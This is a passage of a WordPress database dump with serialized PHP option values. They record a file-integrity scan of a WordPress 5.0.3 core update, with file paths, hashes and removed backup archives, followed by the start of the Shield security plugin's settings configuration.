712\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:102:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/block-library.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"3d87ea3fd4d155e3f8d0e1e96cea6256\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:91:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/blocks.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"e66a65abca2667e9478f1298b964be52\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:90:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/wplink.min.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"caec3c62a9d482aea3a07473ba2fc765\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:86:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/wplink.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"ad293791760966322c4dda8bc3329848\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:85:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/version.php\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"28603c0ed70fa15ac2c13e62b4de6b9e\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:87:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/functions.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"10bd4b1d23b8a574eaf862c1eab5c3d9\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:94:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/class.wp-scripts.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"905ab60f4cdecba560c6945e5ecb3528\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:104:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/class-wp-customize-widgets.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"55d48dafd3ed4970fc4fe91893c4eeba\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:91:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/script-loader.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"520380d7517b8677fabb68c24f67d2ab\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:99:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/class-wp-block-parser.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"9d496084cdae11ed52e84f10f21ebbe1\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:104:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/class-wp-customize-manager.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"52fc7189a79e1b68d3f4dc4b3698a8dd\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:82:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/l10n.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"31dd15cac22798b3b52a287087b7aa0e\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:93:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/class-wp-editor.php\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"ade6b639b1749412f232ea6b7b3b0759\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:93:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/css/common-rtl.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"96c50e7ed61f473ae43fea164c028c5a\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:89:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/css/common.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"cfa9e1f2a74fb8c9181b1a4faffec319\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:89:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/css/common-rtl.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"3056f4e370a1881381f87d058a505e13\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:85:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/css/common.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"6488275ef0769671a1ee7f3aa57288dc\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:95:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/includes/update-core.php\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"178d34fc4e431862fe48f1973866a790\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:91:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/edit-form-blocks.php\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"5b164b0021ae9990d10f7e44effb60be\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:79:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/post.php\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"113f984e8ea915a7e082c82c24270aea\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:80:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-admin/about.php\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"a8e8e05e3edb00d74ad51a75898b6c16\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:73:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/license.txt\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"40fc2f39d472a1bb52f4ebe59702e0c2\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:73:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/readme.html\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"55d27f1f9f7f79fa2593a5b32907ee44\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}}s:7:\"removed\";a:6:{s:98:\"wp-content/updraft/backup_2019-01-08-1902_Bintara_Solutions_Sdn_Bhd_BINTA_4f2957ab9bd2-uploads.zip\";a:5:{s:1:\"d\";i:1546946271;s:1:\"h\";s:32:\"7916db152d55aefc5ff75e1d1ce9c0c7\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:97:\"wp-content/updraft/backup_2019-01-08-1902_Bintara_Solutions_Sdn_Bhd_BINTA_4f2957ab9bd2-others.zip\";a:5:{s:1:\"d\";i:1546946273;s:1:\"h\";s:32:\"998eb6460c208f7f4f634d71f4e024b3\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:92:\"wp-content/updraft/backup_2019-01-08-1902_Bintara_Solutions_Sdn_Bhd_BINTA_4f2957ab9bd2-db.gz\";a:5:{s:1:\"d\";i:1546946283;s:1:\"h\";s:32:\"264ca9c31605c37e774a534e97b326e3\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:97:\"wp-content/updraft/backup_2019-01-08-1902_Bintara_Solutions_Sdn_Bhd_BINTA_4f2957ab9bd2-themes.zip\";a:5:{s:1:\"d\";i:1546945668;s:1:\"h\";s:32:\"3665052ef133fa30e6a75065c1466c2d\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:39:\"wp-content/updraft/log.4f2957ab9bd2.txt\";a:5:{s:1:\"d\";i:1546946768;s:1:\"h\";s:32:\"6d5651c804e4ebf7dcc64ea4f37e16a2\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/updraft/backup_2019-01-08-1902_Bintara_Solutions_Sdn_Bhd_BINTA_4f2957ab9bd2-plugins.zip\";a:5:{s:1:\"d\";i:1546945665;s:1:\"h\";s:32:\"9aac6092d2361dfb9b1f4b829f940934\";s:1:\"t\";s:1:\"r\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}}s:7:\"changed\";a:57:{s:31:\"wp-admin/css/common-rtl.min.css\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"96c50e7ed61f473ae43fea164c028c5a\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:27:\"wp-admin/css/common.min.css\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"cfa9e1f2a74fb8c9181b1a4faffec319\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:27:\"wp-admin/css/common-rtl.css\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"3056f4e370a1881381f87d058a505e13\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:23:\"wp-admin/css/common.css\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"6488275ef0769671a1ee7f3aa57288dc\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:29:\"wp-admin/edit-form-blocks.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"5b164b0021ae9990d10f7e44effb60be\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:17:\"wp-admin/post.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"113f984e8ea915a7e082c82c24270aea\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:18:\"wp-admin/about.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"a8e8e05e3edb00d74ad51a75898b6c16\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:37:\"wp-includes/css/dist/editor/style.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"59d50c0db9d21f6a092e347714520c01\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:45:\"wp-includes/css/dist/editor/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"ab6108c21a2a1d14df1dc9f0d49827d7\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:41:\"wp-includes/css/dist/editor/style-rtl.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"54a9556e4830fb69925ad216617c5aad\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:41:\"wp-includes/css/dist/editor/style.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"c16f103ecb87682ba3b40546bd0568ed\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:44:\"wp-includes/css/dist/block-library/style.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"b57c9841759fb679653e42162a9218c7\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:52:\"wp-includes/css/dist/block-library/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"d853d590816c08875d95849875e42648\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:48:\"wp-includes/css/dist/block-library/style-rtl.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"76adcd3fae217c56e6fc3ff97257a3b4\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:48:\"wp-includes/css/dist/block-library/style.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"eb1a96949e0ea0d08033d3f941bf1f3e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:41:\"wp-includes/css/dist/components/style.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"ceaf3c35802604ba2964561a5c15cafd\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:49:\"wp-includes/css/dist/components/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"c1b549e7ed316bf5a1d38d545923230e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:45:\"wp-includes/css/dist/components/style-rtl.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"23207926b6554158a37d95234a23414f\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:45:\"wp-includes/css/dist/components/style.min.css\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"50242e6ba592897625683280e2cc183d\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:32:\"wp-includes/js/dist/core-data.js\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"d9d282309deba0fae8e0d9e1390bb2a0\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:28:\"wp-includes/js/dist/hooks.js\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"d1495ca6445d4be01ea2c604ffad2c91\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:33:\"wp-includes/js/dist/blocks.min.js\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"f39f38665ac6b784630b3f652375580b\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:27:\"wp-includes/js/dist/data.js\";a:5:{s:1:\"d\";i:1547081525;s:1:\"h\";s:32:\"8a70f593b4e1c7255d1477a5b943de61\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:36:\"wp-includes/js/dist/block-library.js\";a:5:{s:1:\"d\";i:1547081525;s:1:\"h\";s:32:\"f8dd79f25b1b88b0dac790416138a00a\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:33:\"wp-includes/js/dist/editor.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"6191d588e62256e25a4e735c318b5ab0\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:30:\"wp-includes/js/dist/url.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"4d6c78efb41747c864b4dc24c5c7f939\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:26:\"wp-includes/js/dist/url.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"026d66222af818d4aab9a2059165b064\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:35:\"wp-includes/js/dist/viewport.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"d7932636c66dd528dc7fd98caa7a607e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:36:\"wp-includes/js/dist/edit-post.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"7423dbf596bd505ff600ab11c69d15c2\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:31:\"wp-includes/js/dist/data.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"07c02f5b612470483def32a975cd96cf\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:30:\"wp-includes/js/dist/dom.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"a2f3f8a8d0643c3fef95f4c59b78472a\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:33:\"wp-includes/js/dist/components.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"51965929307297ed0ef5e9ad07709dfa\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:32:\"wp-includes/js/dist/hooks.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"372901e50eb2d47eb24cb57a62aaa7f2\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:37:\"wp-includes/js/dist/components.min.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"84cdfb957f060ba494e4a5178672c106\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:31:\"wp-includes/js/dist/viewport.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"ea43d42792f43b764449b2618693c069\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:29:\"wp-includes/js/dist/editor.js\";a:5:{s:1:\"d\";i:1547081529;s:1:\"h\";s:32:\"dc9f3b6295f11d544425284077dbe77f\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:32:\"wp-includes/js/dist/edit-post.js\";a:5:{s:1:\"d\";i:1547081531;s:1:\"h\";s:32:\"3a8f886d748dd1bc6390f29b8b1cc909\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:36:\"wp-includes/js/dist/core-data.min.js\";a:5:{s:1:\"d\";i:1547081531;s:1:\"h\";s:32:\"73143e8195b1151c70875f1f7717e778\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:26:\"wp-includes/js/dist/dom.js\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"0da7a6c0a8988d47b4cbc451ed68e712\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:40:\"wp-includes/js/dist/block-library.min.js\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"3d87ea3fd4d155e3f8d0e1e96cea6256\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:29:\"wp-includes/js/dist/blocks.js\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"e66a65abca2667e9478f1298b964be52\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:28:\"wp-includes/js/wplink.min.js\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"caec3c62a9d482aea3a07473ba2fc765\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:24:\"wp-includes/js/wplink.js\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"ad293791760966322c4dda8bc3329848\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:23:\"wp-includes/version.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"28603c0ed70fa15ac2c13e62b4de6b9e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:25:\"wp-includes/functions.php\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"10bd4b1d23b8a574eaf862c1eab5c3d9\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:32:\"wp-includes/class.wp-scripts.php\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"905ab60f4cdecba560c6945e5ecb3528\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:42:\"wp-includes/class-wp-customize-widgets.php\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"55d48dafd3ed4970fc4fe91893c4eeba\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:29:\"wp-includes/script-loader.php\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"520380d7517b8677fabb68c24f67d2ab\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:37:\"wp-includes/class-wp-block-parser.php\";a:5:{s:1:\"d\";i:1547081519;s:1:\"h\";s:32:\"9d496084cdae11ed52e84f10f21ebbe1\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:42:\"wp-includes/class-wp-customize-manager.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"52fc7189a79e1b68d3f4dc4b3698a8dd\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:20:\"wp-includes/l10n.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"31dd15cac22798b3b52a287087b7aa0e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:31:\"wp-includes/class-wp-editor.php\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"ade6b639b1749412f232ea6b7b3b0759\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:11:\"license.txt\";a:5:{s:1:\"d\";i:1547081533;s:1:\"h\";s:32:\"40fc2f39d472a1bb52f4ebe59702e0c2\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:21:\"WordPress Core v5.0.3\";}s:36:\"wp-content/wflogs/config-livewaf.php\";a:5:{s:1:\"d\";i:1547088869;s:1:\"h\";s:32:\"70fcab41dda6c5dfffb86e6518e02c3e\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:35:\"wp-content/wflogs/config-synced.php\";a:5:{s:1:\"d\";i:1547090046;s:1:\"h\";s:32:\"7f8182b22af1d9902a2a6afdecbe6241\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:38:\"wp-content/wflogs/config-transient.php\";a:5:{s:1:\"d\";i:1547046175;s:1:\"h\";s:32:\"623d0e7dcbc53cf19d7f79a57c627e61\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:9:\"error_log\";a:5:{s:1:\"d\";i:1547089997;s:1:\"h\";s:32:\"beb7237bb9c28b8909e6f84e157b4fb1\";s:1:\"t\";s:1:\"c\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}}s:6:\"memory\";d:9.32000000000000028421709430404007434844970703125;s:11:\"memory_peak\";d:27.03999999999999914734871708787977695465087890625;}'),(33624,1,'shield_mod_config_27b15569f3f5ae27b74dd885e7a83b16','a:6:{s:10:\"properties\";a:15:{s:4:\"slug\";s:6:\"plugin\";s:4:\"name\";s:16:\"General Settings\";s:10:\"menu_title\";s:8:\"Settings\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:6:\"plugin\";s:7:\"tagline\";s:23:\"General Plugin Settings\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:10;}s:13:\"admin_notices\";a:6:{s:17:\"override-forceoff\";a:6:{s:2:\"id\";s:17:\"override-forceoff\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:14:\"wizard_welcome\";a:3:{s:2:\"id\";s:14:\"wizard_welcome\";s:8:\"per_user\";b:0;s:4:\"type\";s:4:\"info\";}s:26:\"plugin-mailing-list-signup\";a:4:{s:2:\"id\";s:26:\"plugin-mailing-list-signup\";s:16:\"min_install_days\";i:5;s:4:\"type\";s:5:\"promo\";s:12:\"drip_form_id\";s:9:\"250437573\";}s:23:\"plugin-update-available\";a:2:{s:2:\"id\";s:23:\"plugin-update-available\";s:4:\"type\";s:7:\"warning\";}s:14:\"allow-tracking\";a:4:{s:2:\"id\";s:14:\"allow-tracking\";s:12:\"plugin_admin\";b:1;s:16:\"min_install_days\";i:3;s:4:\"type\";s:5:\"promo\";}s:11:\"rate-plugin\";a:3:{s:2:\"id\";s:11:\"rate-plugin\";s:16:\"min_install_days\";i:30;s:4:\"type\";s:5:\"promo\";}}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:16:\"section_defaults\";s:7:\"primary\";b:1;s:5:\"title\";s:15:\"Plugin Defaults\";s:11:\"title_short\";s:15:\"Plugin Defaults\";s:13:\"help_video_id\";s:9:\"338533495\";}i:1;a:4:{s:4:\"slug\";s:30:\"section_general_plugin_options\";s:5:\"title\";s:22:\"General Plugin Options\";s:11:\"title_short\";s:15:\"General Options\";s:13:\"help_video_id\";s:9:\"338540386\";}i:2;a:4:{s:4:\"slug\";s:26:\"section_third_party_google\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:16:\"Google reCAPTCHA\";s:13:\"help_video_id\";s:9:\"338546796\";}i:3;a:3:{s:4:\"slug\";s:20:\"section_importexport\";s:5:\"title\";s:15:\"Import / Export\";s:11:\"title_short\";s:15:\"Import / Export\";}i:4;a:3:{s:4:\"slug\";s:31:\"section_global_security_options\";s:5:\"title\";s:30:\"Global Plugin Security Options\";s:11:\"title_short\";s:14:\"Disable 